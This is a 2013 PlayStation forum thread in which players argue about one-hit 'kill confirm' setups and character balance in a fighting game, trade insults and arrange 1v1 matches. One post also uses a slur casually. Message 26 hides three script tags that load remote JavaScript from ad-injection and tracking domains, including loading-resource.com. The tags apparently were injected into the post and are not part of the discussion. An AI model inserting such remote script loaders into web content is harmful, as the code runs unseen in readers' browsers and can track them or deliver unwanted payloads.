Hekseville Citizen
282 posts

Re: We can come to a compromise!( kill confirm discussion)

Feb 7, 2013

thats to you Gale, obviously.

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Message 21 of 46 (164 Views)
0 Likes
Wastelander
587 posts

[ Edited ]
Feb 7, 2013

Mogilicudi wrote:

thats to you Gale, obviously.

Not obvious, actually. Why are you constantly coming at me about facts? I'm not even the one who brought them up.

And how the heck am I a hypocrite?

Message 22 of 46 (160 Views)
0 Likes
Highlighted
I Only Post Everything
1025 posts

Feb 7, 2013
You dont even have an argument Gale. I didnt toss out Blind assumptions. I remember your previos threads about how you cant handle it in online. I even added you to try and help you out but nah.

And as mog said, this is a discussion about whether they should be toned down or stay how they are and you tell someone their advice is just garbage? Especially when they bust their butt to make so many tournaments for this game possible? It's cool, youre just not very good.
Message 23 of 46 (155 Views)
Survivor
2365 posts

Feb 7, 2013

Fat_Slapper wrote:
You dont even have an argument Gale. I didnt toss out Blind assumptions. I remember your previos threads about how you cant handle it in online. I even added you to try and help you out but nah.

And as mog said, this is a discussion about whether they should be toned down or stay how they are and you tell someone their advice is just garbage? Especially when they bust their butt to make so many tournaments for this game possible? It's cool, youre just not very good.

That last part makes me feel really loved. I'm glad some people apreciate the efforts. Smiley Happy

And honestly, you two responded better then I could have. So I'll let those responces stand. Smiley Happy

Message 24 of 46 (144 Views)
Wastelander
587 posts

Feb 7, 2013

Fat_Slapper wrote:

Yeah, I've made threads venting the frustrations I've had with this game. There's a lot I've learned over time, and while I still lack skill, I do have plenty of knowledge about how to defend myself and fight back. You're talking as though I can't see a truck coming to run me over in broad daylight (metaphorically speaking).

Also, I forgot who you were. I remember getting a message from you last night asking if I were up for some games. I just didn't remember you.

I didn't say Aylas' post was garbage. I was simply letting telling him how it is. It's very long-winded and he brings up too many rhetorical questions. It'd benefit him to make his posts more consise and to the point. Sure, I could have stated that better, but I usually do just come off as a jerk and not care. Sorry if that upsets people.

Also, mind if we have a 1v1? I well aware that I lack skill, but I'm getting tired of people talking as though I don't know my **bleep** from my face. If I can prove I don't wholeheartedly suck, I'd feel better about things.

Message 25 of 46 (138 Views)
0 Likes
Gaming Beast
2167 posts

Feb 7, 2013

khknight wrote:

Fat_Slapper wrote:
I dont know man... That would require a lot more balancing than you may think.

Every character has a way to one hit kill with their level 1 and yes some easier than others. I dont mind falling for something like the giga punch or suck cannon once, but if thats all you try to do everytime you get a level 1 it's kinda gay. At least try and mix it up, because each character probably has 2 ways to setup for an easy 1 hit kill.

For a first time brawler for the playstation,i find it to be a pretty balanced roster actually. Yeah it has it's flaws and balance tweaks, but you'll never have a game like this 100% balanced. We can all smell the sequel brewing, and people will find ways to one hit kill in that too. Oh well.

You sure? they got rid of raidens grab kill confirm just by changing the stance the opponent is in after being grabbed. They could probably do something similar for the other characters.  Not all the characters would have to change either, only about six would need a change.

If it takes while to get a fix for this out, thats fine. I can wait as long as I know its coming.

Yes, they also made Raiden a somewhat bad character now. I say somewhat because he's still better than Dante/Radec/Heihachi/etc, but yeah...

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 26 of 46 (133 Views)
0 Likes
I Only Post Everything
1025 posts

Feb 7, 2013
See, a way better post than your original. And with an argument that's a lot harder to break apart.

It's been multiple times I've sent you game invites, I've been wanting to 1v1 you. Youre right, thi was awhile ago and hopefully you've improved. It may just be me but I dont think sly has that much of an OP lvl1, and Kratos drake and raiden are not also as OP as everyone says.
Message 27 of 46 (132 Views)
0 Likes
Splicer
65 posts

Re: Can there be a compromise?(kill confirm discussion)

Feb 7, 2013
Still doesn't stop characters like drake and Raiden who can kill character because they hey a nice lvl 1
Message 28 of 46 (112 Views)
0 Likes
Splicer
65 posts

Feb 7, 2013
Why does kratos gain ap so fast? If he gained it more slowly and wasn't able to freakin follow up with an immediate attack on block or whiff he would be bearable.
Message 29 of 46 (104 Views)
0 Likes
Uncharted Territory
1174 posts

Feb 7, 2013
That's one big wall of text. no one would wanna attack that Smiley Sad
Skill, Coordination, and Experience will lead a team to victory.
Message 30 of 46 (91 Views)
0 Likes